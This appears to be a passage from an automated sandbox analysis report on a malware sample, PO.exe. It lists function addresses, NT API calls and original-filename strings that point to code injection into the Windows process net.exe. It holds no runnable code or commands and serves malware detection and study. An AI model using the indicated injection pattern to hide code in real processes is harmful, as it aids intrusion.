                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E93010 NtOpenDirectoryObject,7_2_02E93010
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E93D70 NtOpenThread,7_2_02E93D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E93D10 NtOpenProcessToken,7_2_02E93D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00449270 NtCreateFile,7_2_00449270
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004493D0 NtReadFile,7_2_004493D0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004494C0 NtDeleteFile,7_2_004494C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00449560 NtClose,7_2_00449560
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004496D0 NtAllocateVirtualMemory,7_2_004496D0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACF7E7 NtMapViewOfSection,7_2_00ACF7E7
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACF9EE NtSetContextThread,7_2_00ACF9EE
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0141DFC40_2_0141DFC4
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759BF780_2_0759BF78
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759A6580_2_0759A658
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07599E480_2_07599E48
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07591A400_2_07591A40
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759B0580_2_0759B058
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07598F580_2_07598F58
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759CF700_2_0759CF70
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759BF250_2_0759BF25
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759CF800_2_0759CF80
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07599E380_2_07599E38
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759DDC20_2_0759DDC2
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E5F00_2_0759E5F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E5E10_2_0759E5E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E3520_2_0759E352
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E3600_2_0759E360
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07591A300_2_07591A30
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E1F00_2_0759E1F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0759E1E00_2_0759E1E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079082880_2_07908288
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079041E80_2_079041E8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07903B080_2_07903B08
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079028700_2_07902870
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790B7880_2_0790B788
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079046B20_2_079046B2
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079046B80_2_079046B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079082780_2_07908278
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790D2680_2_0790D268
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079041DA0_2_079041DA
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790001F0_2_0790001F
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079000400_2_07900040
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902FB00_2_07902FB0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902FA10_2_07902FA1
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902D580_2_07902D58
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902D490_2_07902D49
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790DC180_2_0790DC18
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0790BBC00_2_0790BBC0
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902B080_2_07902B08
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07902AF80_2_07902AF8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_07903AF80_2_07903AF8
                Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_079028600_2_07902860
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004185E32_2_004185E3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004010002_2_00401000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040E1432_2_0040E143
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004011602_2_00401160
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040E13B2_2_0040E13B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004023A02_2_004023A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004014602_2_00401460
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0042ED432_2_0042ED43
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FDC32_2_0040FDC3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FDBA2_2_0040FDBA
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040264C2_2_0040264C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004026502_2_00402650
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_00402F302_2_00402F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040FFE32_2_0040FFE3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_004167F32_2_004167F3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0040DFF32_2_0040DFF3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017881582_2_01788158
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179A1182_2_0179A118
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F01002_2_016F0100
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B81CC2_2_017B81CC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C01AA2_2_017C01AA
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017920002_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA3522_2_017BA352
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F02_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C03E62_2_017C03E6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A02742_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017802C02_2_017802C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017005352_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C05912_2_017C0591
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B24462_2_017B2446
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A44202_2_017A4420
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AE4F62_2_017AE4F6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017007702_2_01700770
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017247502_2_01724750
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FC7C02_2_016FC7C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171C6E02_2_0171C6E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017169622_2_01716962
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017029A02_2_017029A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017CA9A62_2_017CA9A6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170A8402_2_0170A840
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017028402_2_01702840
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E8F02_2_0172E8F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E68B82_2_016E68B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BAB402_2_017BAB40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B6BD72_2_017B6BD7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FEA802_2_016FEA80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179CD1F2_2_0179CD1F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170AD002_2_0170AD00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FADE02_2_016FADE0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01718DBF2_2_01718DBF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700C002_2_01700C00
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F0CF22_2_016F0CF2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0CB52_2_017A0CB5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01774F402_2_01774F40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01720F302_2_01720F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A2F302_2_017A2F30
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01742F282_2_01742F28
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2FC82_2_016F2FC8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177EFA02_2_0177EFA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700E592_2_01700E59
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BEE262_2_017BEE26
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BEEDB2_2_017BEEDB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01712E902_2_01712E90
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BCE932_2_017BCE93
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017CB16B2_2_017CB16B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EF1722_2_016EF172
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173516C2_2_0173516C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170B1B02_2_0170B1B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B70E92_2_017B70E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BF0E02_2_017BF0E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017070C02_2_017070C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AF0CC2_2_017AF0CC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016ED34C2_2_016ED34C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B132D2_2_017B132D
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0174739A2_2_0174739A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171D2F02_2_0171D2F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A12ED2_2_017A12ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171B2C02_2_0171B2C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017052A02_2_017052A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B75712_2_017B7571
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179D5B02_2_0179D5B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F14602_2_016F1460
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BF43F2_2_017BF43F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BF7B02_2_017BF7B0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B16CC2_2_017B16CC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017099502_2_01709950
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171B9502_2_0171B950
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017959102_2_01795910
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176D8002_2_0176D800
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017038E02_2_017038E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BFB762_2_017BFB76
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01775BF02_2_01775BF0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0173DBF92_2_0173DBF9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171FB802_2_0171FB80
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01773A6C2_2_01773A6C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BFA492_2_017BFA49
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B7A462_2_017B7A46
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017ADAC62_2_017ADAC6
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01745AA02_2_01745AA0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179DAAC2_2_0179DAAC
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A1AA32_2_017A1AA3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B7D732_2_017B7D73
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B1D5A2_2_017B1D5A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01703D402_2_01703D40
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171FDC02_2_0171FDC0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01779C322_2_01779C32
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BFCF22_2_017BFCF2
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BFF092_2_017BFF09
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BFFB12_2_017BFFB1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01701F922_2_01701F92
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01709EB02_2_01709EB0
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B092F06_2_02B092F0
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B0B3306_2_02B0B330
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B093406_2_02B09340
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B11B406_2_02B11B40
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B2A0906_2_02B2A090
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B139306_2_02B13930
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B0B1106_2_02B0B110
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B0B1076_2_02B0B107
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exeCode function: 6_2_02B094906_2_02B09490
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE02C07_2_02EE02C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F002747_2_02F00274
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F203E67_2_02F203E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E6E3F07_2_02E6E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1A3527_2_02F1A352
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF20007_2_02EF2000
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F181CC7_2_02F181CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F141A27_2_02F141A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F201AA7_2_02F201AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE81587_2_02EE8158
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E501007_2_02E50100
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFA1187_2_02EFA118
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7C6E07_2_02E7C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E5C7C07_2_02E5C7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E607707_2_02E60770
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E847507_2_02E84750
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0E4F67_2_02F0E4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F124467_2_02F12446
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F044207_2_02F04420
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F205917_2_02F20591
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E605357_2_02E60535
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E5EA807_2_02E5EA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F16BD77_2_02F16BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1AB407_2_02F1AB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E8E8F07_2_02E8E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E468B87_2_02E468B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E628407_2_02E62840
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E6A8407_2_02E6A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E629A07_2_02E629A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F2A9A67_2_02F2A9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E769627_2_02E76962
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1EEDB7_2_02F1EEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1CE937_2_02F1CE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E72E907_2_02E72E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E60E597_2_02E60E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1EE267_2_02F1EE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E52FC87_2_02E52FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EDEFA07_2_02EDEFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ED4F407_2_02ED4F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F02F307_2_02F02F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EA2F287_2_02EA2F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E80F307_2_02E80F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E50CF27_2_02E50CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F00CB57_2_02F00CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E60C007_2_02E60C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E5ADE07_2_02E5ADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E78DBF7_2_02E78DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E6AD007_2_02E6AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFCD1F7_2_02EFCD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7D2F07_2_02E7D2F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F012ED7_2_02F012ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7B2C07_2_02E7B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E652A07_2_02E652A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EA739A7_2_02EA739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E4D34C7_2_02E4D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1132D7_2_02F1132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1F0E07_2_02F1F0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F170E97_2_02F170E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E670C07_2_02E670C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0F0CC7_2_02F0F0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E6B1B07_2_02E6B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E9516C7_2_02E9516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E4F1727_2_02E4F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F2B16B7_2_02F2B16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F116CC7_2_02F116CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EA56307_2_02EA5630
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1F7B07_2_02F1F7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E514607_2_02E51460
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1F43F7_2_02F1F43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFD5B07_2_02EFD5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F175717_2_02F17571
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0DAC67_2_02F0DAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFDAAC7_2_02EFDAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EA5AA07_2_02EA5AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F01AA37_2_02F01AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ED3A6C7_2_02ED3A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F17A467_2_02F17A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1FA497_2_02F1FA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E9DBF97_2_02E9DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ED5BF07_2_02ED5BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7FB807_2_02E7FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1FB767_2_02F1FB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E638E07_2_02E638E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ECD8007_2_02ECD800
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E699507_2_02E69950
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7B9507_2_02E7B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF59107_2_02EF5910
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E69EB07_2_02E69EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1FFB17_2_02F1FFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E61F927_2_02E61F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1FF097_2_02F1FF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1FCF27_2_02F1FCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ED9C327_2_02ED9C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E7FDC07_2_02E7FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F17D737_2_02F17D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02E63D407_2_02E63D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F11D5A7_2_02F11D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00431D807_2_00431D80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042CC077_2_0042CC07
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042CC107_2_0042CC10
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042AE407_2_0042AE40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042CE307_2_0042CE30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042AF887_2_0042AF88
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0042AF907_2_0042AF90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004354307_2_00435430
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004336407_2_00433640
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0044BB907_2_0044BB90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACE2147_2_00ACE214
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACE3357_2_00ACE335
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACE6CC7_2_00ACE6CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACD7987_2_00ACD798
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACC9F67_2_00ACC9F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_00ACCA487_2_00ACCA48
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02E4B970 appears 262 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02E95130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02ECEA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02EDF290 appears 103 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02EA7E54 appears 107 times
                Source: C:\Users\user\Desktop\PO.exeCode function: String function: 01735130 appears 58 times
                Source: C:\Users\user\Desktop\PO.exeCode function: String function: 0176EA12 appears 86 times
                Source: C:\Users\user\Desktop\PO.exeCode function: String function: 0177F290 appears 103 times
                Source: C:\Users\user\Desktop\PO.exeCode function: String function: 01747E54 appears 99 times
                Source: C:\Users\user\Desktop\PO.exeCode function: String function: 016EB970 appears 262 times
                Source: PO.exe, 00000000.00000000.1753975528.0000000000C80000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiJcB.exe< vs PO.exe
                Source: PO.exe, 00000000.00000002.1787400778.000000000119E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO.exe
                Source: PO.exe, 00000000.00000002.1795477777.000000000BA90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO.exe
                Source: PO.exe, 00000002.00000002.2274931580.0000000001294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenet.exej% vs PO.exe
                Source: PO.exe, 00000002.00000002.2275360334.00000000017ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
                Source: PO.exe, 00000002.00000002.2274931580.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenet.exej% vs PO.exe
                Source: PO.exeBinary or memory string: OriginalFilenameiJcB.exe< vs PO.exe
                Source: PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO.exe.4b9b538.3.raw.unpack, yQbVrTc8MDjXSoBqhr.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
